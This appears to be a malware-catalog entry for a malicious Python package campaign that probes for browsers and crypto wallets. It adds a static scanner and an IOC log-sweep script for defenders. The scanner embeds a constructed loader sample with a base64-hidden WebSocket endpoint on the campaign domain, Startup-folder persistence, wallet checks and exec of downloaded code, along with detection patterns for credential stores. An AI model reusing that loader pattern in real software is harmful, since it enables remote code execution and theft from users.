
MALICIOUS (1) campaign, cataloged 2025-07-31 (2).

  1. The campaign has clearly malicious intent, such as an infostealer.
  2. This is only the date the catalog entry was created; it may not reflect when the campaign itself began.

2025-07-backtradingbot

Running the installed entry point downloads and executes remote code. During analysis, the code switched to WebSockets, added a startup script, and downloaded further stages, which ultimately looked for browser and crypto-wallet data. At present the operators do not appear to exfiltrate the sensitive data itself, but rather report which web browsers and wallets are present.

It uses the same remote domain as campaign 2025-07-db-indicator, but a significantly different payload.
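A static triage pass for the behaviour described above, as an added example and not tooling from this catalog. It assumes the package is Python; the only campaign-specific indicator is the etherjs.pro domain listed under References, the regexes for each abuse category are generic assumptions about what such loaders contain, and both sample files are constructed stand-ins rather than the campaign's code. It also shows why a plain grep for the domain is not enough: the constructed sample hides its WebSocket endpoint in base64 and splits the startup-folder path across concatenated literals, so the scanner folds literal chains and decodes base64 before matching.

```python
"""Static triage of a Python package for the behaviours this entry describes.
Added example, not the catalog's tooling.  Only `etherjs.pro` comes from the
entry; every other pattern is an assumed heuristic and the samples are constructed."""
import ast
import base64
import re
from typing import Dict, List

# Indicator from the References section, used as a match pattern only.
CAMPAIGN_DOMAINS = ("etherjs.pro",)

# Generic heuristics keyed to the entry's abuse categories (assumed, not taken from the sample).
HEURISTICS: Dict[str, List[str]] = {
    "remote_script": [r"\bexec\s*\(", r"\beval\s*\(", r"\burllib\.request\b", r"\brequests\.get\b"],
    "websocket_c2": [r"\bwss?://", r"\bwebsockets?\b"],
    "peristence_autorun": [r"Programs\\Startup", r"CurrentVersion\\Run", r"\.config/autostart", r"\bcrontab\b"],
    "exfiltration_browser_data": [r"User Data\\Default", r"Firefox\\Profiles", r"Login Data"],
    "crypto-related": [r"\bMetaMask\b", r"\bExodus\b", r"\bElectrum\b", r"\bwallet\b"],
    "basic_exfiltration": [r"\bgetpass\.getuser\b", r"\bsocket\.gethostname\b", r"\bipify\b"],
}
_B64 = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")


def _is_str(node) -> bool:
    return isinstance(node, ast.Constant) and isinstance(node.value, str)


def _add_chain(node: ast.AST) -> List[ast.AST]:
    """Flatten a left-associative 'a + b + c' expression into its operands."""
    if isinstance(node, ast.BinOp) and isinstance(node.op, ast.Add):
        return _add_chain(node.left) + _add_chain(node.right)
    return [node]


def string_corpus(source: str) -> List[str]:
    """Text worth matching: the raw source, every string literal, runs of
    '+'-joined literals folded (so a split URL or path surfaces), and base64
    literals decoded when they yield printable text."""
    corpus = [source]
    try:
        tree = ast.parse(source)
    except SyntaxError:  # not Python, or obfuscated past parsing: raw text only
        return corpus
    for node in ast.walk(tree):
        if _is_str(node):
            corpus.append(node.value)
            if _B64.match(node.value):
                try:
                    decoded = base64.b64decode(node.value, validate=True).decode("ascii")
                    if decoded.isprintable():
                        corpus.append(decoded)
                except ValueError:  # covers binascii.Error and UnicodeDecodeError
                    pass
        elif isinstance(node, ast.BinOp) and isinstance(node.op, ast.Add):
            run: List[str] = []
            for part in _add_chain(node) + [None]:  # None flushes the final run
                if part is not None and _is_str(part):
                    run.append(part.value)
                    continue
                if len(run) > 1:
                    corpus.append("".join(run))
                run = []
    return corpus


def scan_source(source: str) -> Dict[str, List[str]]:
    """Map each abuse category to the patterns it matched, plus 'campaign_ioc' on a catalog domain."""
    corpus = string_corpus(source)
    hits = {c: [p for p in ps if any(re.search(p, s) for s in corpus)] for c, ps in HEURISTICS.items()}
    hits = {c: ps for c, ps in hits.items() if ps}
    iocs = [d for d in CAMPAIGN_DOMAINS if any(d in s for s in corpus)]
    if iocs:
        hits["campaign_ioc"] = iocs
    return hits


def verdict(hits: Dict[str, List[str]]) -> str:
    """A catalog IOC is decisive; otherwise a stage loader plus collection/persistence needs review."""
    if "campaign_ioc" in hits:
        return "known_campaign_indicator"
    loader = {"remote_script", "websocket_c2"} & set(hits)
    payload = {"exfiltration_browser_data", "crypto-related", "peristence_autorun"} & set(hits)
    return "review_required" if loader and payload else "low"


# Constructed samples.  SUSPICIOUS mirrors the entry's description (WebSocket
# stage, startup-folder persistence, browser/wallet presence check, exec of a
# downloaded stage) with the endpoint base64-encoded and the path split.
BENIGN = "import json\n\ndef load(path):\n    with open(path) as fh:\n        return json.load(fh)\n"
SUSPICIOUS = r'''
import base64, json, os, socket, websocket
from urllib.request import urlopen
ENDPOINT = base64.b64decode("d3NzOi8vYXBpLmV0aGVyanMucHJvL3NvY2tldHM/dHlwZT0y").decode()
STARTUP = os.path.expandvars("%APPDATA%") + "\\Microsoft\\Windows\\Start Menu\\Programs" + "\\Startup"
def main():
    local = os.path.expandvars("%LOCALAPPDATA%")
    report = {"host": socket.gethostname(),
              "chrome": os.path.isdir(local + "\\Google\\Chrome\\User Data\\Default"),
              "metamask": os.path.isdir(local + "\\MetaMask")}
    ws = websocket.create_connection(ENDPOINT)
    ws.send(json.dumps(report))
    exec(urlopen(ws.recv()).read())
'''
```

Run `scan_source(SUSPICIOUS)` and every category of this entry plus `campaign_ioc` comes back, while the raw text of the sample never contains `etherjs.pro` or `Programs\Startup`; `scan_source(BENIGN)` returns an empty dict. The verdict is deliberately conservative: heuristics alone only flag a file for review, and only the catalog's own indicator is treated as decisive.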

Abuse categories

basic_exfiltration

The package contains code to exfiltrate basic system data, such as the IP address or username. On its own this carries limited risk.

crypto-related

The campaign is crypto-related: here it probes for cryptocurrency wallets.

exfiltration_browser_data

The campaign collects browser data: in this sample, the presence of installed web browsers rather than the sensitive data they store.

peristence_autorun

The campaign establishes persistence by adding a startup script (autorun).

remote_script

Downloads and executes a remote malicious script.

References

Referenced resources may include blog posts about the campaign, malware analyses, sandbox reports, or other relevant information.

The indicators listed below are URLs with payloads, characteristic domains, C&C IPs, repositories with malicious code, etc.

  • hxxps://api.etherjs.pro/sockets?type=2

  • hxxps://api.etherjs.pro/sockets?type=2&cid=ft

  • etherjs.pro
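Sweeping egress telemetry for the indicators above, as an added example rather than the catalog's tooling. The three IOC strings are the entry's own, kept in their defanged form; the log format and the log lines are constructed. It covers two details a practitioner needs to get right: re-arming hxxps and [.] defanging before matching, and matching subdomains of etherjs.pro without firing on look-alike names such as notetherjs.pro.

```python
"""Sweep DNS and proxy logs for this catalog entry's indicators.  Added
example, not the catalog's tooling.  The IOC strings are the entry's (still
defanged); the log format and the log lines are constructed."""
import re
from typing import Iterable, List, NamedTuple, Optional, Set
from urllib.parse import urlsplit

CATALOG_IOCS = [
    "hxxps://api.etherjs.pro/sockets?type=2",
    "hxxps://api.etherjs.pro/sockets?type=2&cid=ft",
    "etherjs.pro",
]


def normalize_host(ioc: str) -> str:
    """Re-arm common defanging (hxxp, [.], (.)) and reduce a URL or bare
    domain to a lower-case host name with no trailing dot."""
    s = ioc.strip().replace("hxxp", "http").replace("[.]", ".").replace("(.)", ".")
    if "://" in s:
        s = urlsplit(s).hostname or ""
    else:
        s = s.split("/", 1)[0]
    return s.lower().rstrip(".")


def ioc_hosts(iocs: Iterable[str]) -> Set[str]:
    return {h for h in (normalize_host(i) for i in iocs) if h}


def match_ioc(host: str, targets: Set[str]) -> Optional[str]:
    """Exact or subdomain match, returning the most specific indicator hit.
    Suffix matching alone is wrong: 'notetherjs.pro' must not match."""
    best = None
    for d in targets:
        if (host == d or host.endswith("." + d)) and (best is None or len(d) > len(best)):
            best = d
    return best


# Constructed key=value log format; url= values are parsed so the query string
# never leaks into the host comparison.
_FIELD = re.compile(r"\b(query|dest|host|url)=(\S+)")


def extract_hosts(line: str) -> List[str]:
    hosts = []
    for key, value in _FIELD.findall(line):
        h = urlsplit(value).hostname if key == "url" else value.lower().rstrip(".")
        if h:
            hosts.append(h)
    return hosts


class Hit(NamedTuple):
    line_no: int
    src: str
    host: str
    ioc: str


def sweep(lines: Iterable[str], iocs: Iterable[str]) -> List[Hit]:
    targets = ioc_hosts(iocs)
    hits: List[Hit] = []
    for n, line in enumerate(lines, 1):
        src = re.search(r"\bsrc=(\S+)", line)
        for host in extract_hosts(line):
            ioc = match_ioc(host, targets)
            if ioc:
                hits.append(Hit(n, src.group(1) if src else "", host, ioc))
    return hits


# Constructed log excerpt: one infected workstation (DNS lookup, then the
# WebSocket upgrade through the proxy), two look-alike names that must not
# fire, and an upper-case FQDN with a trailing dot that must.
SAMPLE_LOG = """\
2025-07-31T09:58:02Z src=10.20.1.14 type=dns query=pypi.org
2025-07-31T09:58:07Z src=10.20.1.14 type=dns query=api.etherjs.pro
2025-07-31T09:58:08Z src=10.20.1.14 type=proxy url=https://api.etherjs.pro/sockets?type=2&cid=ft status=101
2025-07-31T10:01:44Z src=10.20.1.31 type=dns query=notetherjs.pro
2025-07-31T10:02:10Z src=10.20.1.31 type=dns query=etherjs.pro.cdn.example
2025-07-31T10:03:55Z src=10.20.1.52 type=dns query=ETHERJS.PRO.
"""

if __name__ == "__main__":
    for hit in sweep(SAMPLE_LOG.splitlines(), CATALOG_IOCS):
        print(f"line {hit.line_no}: {hit.src} -> {hit.host} (matches {hit.ioc})")
```

On the constructed log the sweep reports lines 2, 3 and 6 only: the two look-alikes on lines 4 and 5 share characters with the indicator but are different registrable domains. A status of 101 on the proxy line is the HTTP upgrade a WebSocket handshake produces, which is the traffic shape the description above ("switched to WebSockets") leads you to expect.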

Packages in the campaign

campaign:2025-07-backtradingbot